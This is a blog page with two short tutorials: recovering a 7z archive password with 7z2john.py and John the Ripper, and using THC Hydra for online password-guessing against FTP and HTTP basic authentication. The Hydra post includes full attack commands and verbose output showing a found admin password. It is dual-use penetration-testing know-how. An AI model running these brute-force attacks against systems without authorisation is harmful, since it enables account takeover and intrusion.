Skyscraper

Mostrando entradas con la etiqueta kali. Mostrar todas las entradas
Mostrando entradas con la etiqueta kali. Mostrar todas las entradas

miércoles, 8 de junio de 2016

Cracking 7z files Using John The Ripper

7z or 7zip it's a compressed archive format that implements AES-256 encryption.  I have an encrypted compressed archive for which I forgot the password.  I decided to guess it using John The Ripper (JTR).

I needed another tool besides JTR. It's a python script called 7z2john.py by PyLZMA Copyright (C) 2004-2010 Joachim Bauch under the GNU LESSER GENERAL PUBLIC LICENSE.  You can Google it: https://www.google.com.co/#q=7z2john.py or clone the repository through git:


  • git clone https://bitbucket.org/dhiru/pylzma-ng.git

To extract the hash of the compressed file just execute the python script:



  • ./7z2john.py archive.7z > hash.txt


Finally use the output of the python script as a input file for JTR.

This attack is only possible when you have a few list of words and the certainty that they are correct, because the AES encryption used by 7z implements protection against bruteforce attacks.  It's a extremely slow process, in my laptop 193 passwords took it 8 seconds.

martes, 26 de enero de 2016

THC Hydra Password Cracker

Hydra is a tool that performs online attacks to guess a valid user & password from a network service.

I've tried it over mysql databases, ftp, http, https, web forms.

There are alternatives like medusa and ncrack, a full online attack may be performed with the three tools, each one can be more successful or faster for every the type of service.

Help and further instructions will be displayed with:

  • hydra -h
  • hydra -U http-post-form

The -U option shows help and examples, especially for the web form attacks. You will need to know deeply how the web form works to perform a successful attack. Tools like Burp Suite will help to track the requests, headers and responses generated by the login pages.

To perform an unsuccessful attack for a ftp service:

hydra 255.255.255.254 ftp -l ftpuser -P /wordlists/passwords.lst -vV

Only one username (-l option) and file with a list of passwords (-P option) -vV for verbosity and 

Hydra v8.1 (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2016-01-25 17:44:07
[DATA] max 16 tasks per 1 server, overall 64 tasks, 16 login tries (l:1/p:16), ~0 tries per task
[DATA] attacking service ftp on port 21
[VERBOSE] Resolving addresses ... done
[ATTEMPT] target 255.255.255.254 - login "pruebaftp" - pass "dic" - 1 of 16 [child 0]
[ATTEMPT] target 255.255.255.254 - login "pruebaftp" - pass "nov" - 2 of 16 [child 1]
[ATTEMPT] target 255.255.255.254 - login "pruebaftp" - pass "oct" - 3 of 16 [child 2]
[ATTEMPT] target 255.255.255.254 - login "pruebaftp" - pass "sep" - 4 of 16 [child 3]
[ATTEMPT] target 255.255.255.254 - login "pruebaftp" - pass "ago" - 5 of 16 [child 4]
[ATTEMPT] target 255.255.255.254 - login "pruebaftp" - pass "jul" - 6 of 16 [child 5]
[ATTEMPT] target 255.255.255.254 - login "pruebaftp" - pass "jun" - 7 of 16 [child 6]
[ATTEMPT] target 255.255.255.254 - login "pruebaftp" - pass "may" - 8 of 16 [child 7]
[ATTEMPT] target 255.255.255.254 - login "pruebaftp" - pass "abr" - 9 of 16 [child 8]
[ATTEMPT] target 255.255.255.254 - login "pruebaftp" - pass "mar" - 10 of 16 [child 9]
[ATTEMPT] target 255.255.255.254 - login "pruebaftp" - pass "feb" - 11 of 16 [child 10]
[ATTEMPT] target 255.255.255.254 - login "pruebaftp" - pass "ene" - 12 of 16 [child 11]
[ATTEMPT] target 255.255.255.254 - login "pruebaftp" - pass "mateo" - 13 of 16 [child 13]
[ATTEMPT] target 255.255.255.254 - login "pruebaftp" - pass "staff" - 14 of 16 [child 6]
[ATTEMPT] target 255.255.255.254 - login "pruebaftp" - pass "inf" - 15 of 16 [child 12]
[ATTEMPT] target 255.255.255.254 - login "pruebaftp" - pass "matias" - 16 of 16 [child 15]
[STATUS] attack finished for 255.255.255.254 (waiting for children to complete tests)
[STATUS] 16.00 tries/min, 16 tries in 00:01h, 1 todo in 00:01h, 5 active
[VERBOSE] Retrying connection for child 13
[VERBOSE] Retrying connection for child 12
[VERBOSE] Retrying connection for child 3
[VERBOSE] Retrying connection for child 14
[VERBOSE] Retrying connection for child 15
1 of 1 target completed, 0 valid passwords found
Hydra (http://www.thc.org/thc-hydra) finished at 2016-01-25 17:45:16

The attack failed because a valid pair user-password wasn't found, the option -L could help replacing the single "-l admin" username with a list of usernames (-L usernames.lst)


To perform a successful attack to an http basic authentication service which resides in folder "stats":

hydra 255.255.255.254 http-get -m /stats -l admin -P list.lst -e nsr -vV


Hydra v8.1 (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2016-01-26 09:38:08
[DATA] max 16 tasks per 1 server, overall 64 tasks, 20 login tries (l:1/p:20), ~0 tries per task
[DATA] attacking service http-get on port 80
[VERBOSE] Resolving addresses ... done
[ATTEMPT] 255.255.255.254 - login "admin" - pass "admin" - 1 of 20 [child 0]
[ATTEMPT] 255.255.255.254 - login "admin" - pass "" - 2 of 20 [child 1]
[ATTEMPT] 255.255.255.254 - login "admin" - pass "nimda" - 3 of 20 [child 2]
[ATTEMPT] 255.255.255.254 - login "admin" - pass "dic" - 4 of 20 [child 3]
[ATTEMPT] 255.255.255.254 - login "admin" - pass "nov" - 5 of 20 [child 4]
[ATTEMPT] 255.255.255.254 - login "admin" - pass "oct" - 6 of 20 [child 5]
[ATTEMPT] 255.255.255.254 - login "admin" - pass "sep" - 7 of 20 [child 6]
[ATTEMPT] 255.255.255.254 - login "admin" - pass "ago" - 8 of 20 [child 7]
[ATTEMPT] 255.255.255.254 - login "admin" - pass "jul" - 9 of 20 [child 8]
[ATTEMPT] 255.255.255.254 - login "admin" - pass "jun" - 10 of 20 [child 9]
[ATTEMPT] 255.255.255.254 - login "admin" - pass "may" - 11 of 20 [child 10]
[ATTEMPT] 255.255.255.254 - login "admin" - pass "abr" - 12 of 20 [child 11]
[ATTEMPT] 255.255.255.254 - login "admin" - pass "mar" - 13 of 20 [child 12]
[ATTEMPT] 255.255.255.254 - login "admin" - pass "feb" - 14 of 20 [child 13]
[ATTEMPT] 255.255.255.254 - login "admin" - pass "ene" - 15 of 20 [child 14]
[ATTEMPT] 255.255.255.254 - login "admin" - pass "Dic.2015" - 16 of 20 [child 15]
[ATTEMPT] 255.255.255.254 - login "admin" - pass "mateo" - 17 of 20 [child 1]
[ATTEMPT] 255.255.255.254 - login "admin" - pass "staff" - 18 of 20 [child 8]
[ATTEMPT] 255.255.255.254 - login "admin" - pass "inf" - 19 of 20 [child 2]
[ATTEMPT] 255.255.255.254 - login "admin" - pass "matias" - 20 of 20 [child 3]
[STATUS] attack finished for prueba.edatel.net.co (waiting for children to complete tests)
[80][http-get] host: 255.255.255.254   login: admin   password: Dic.2015
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2016-01-26 09:38:08

The attack tried the null password, login as password and reverse login as password (option -e nsr) and found a valid pair user-password, the quality of the dictionary of words is the key to success,


If you're are not a fan of the command line tools try Xhydra, a graphical front-end to build and customize your attack.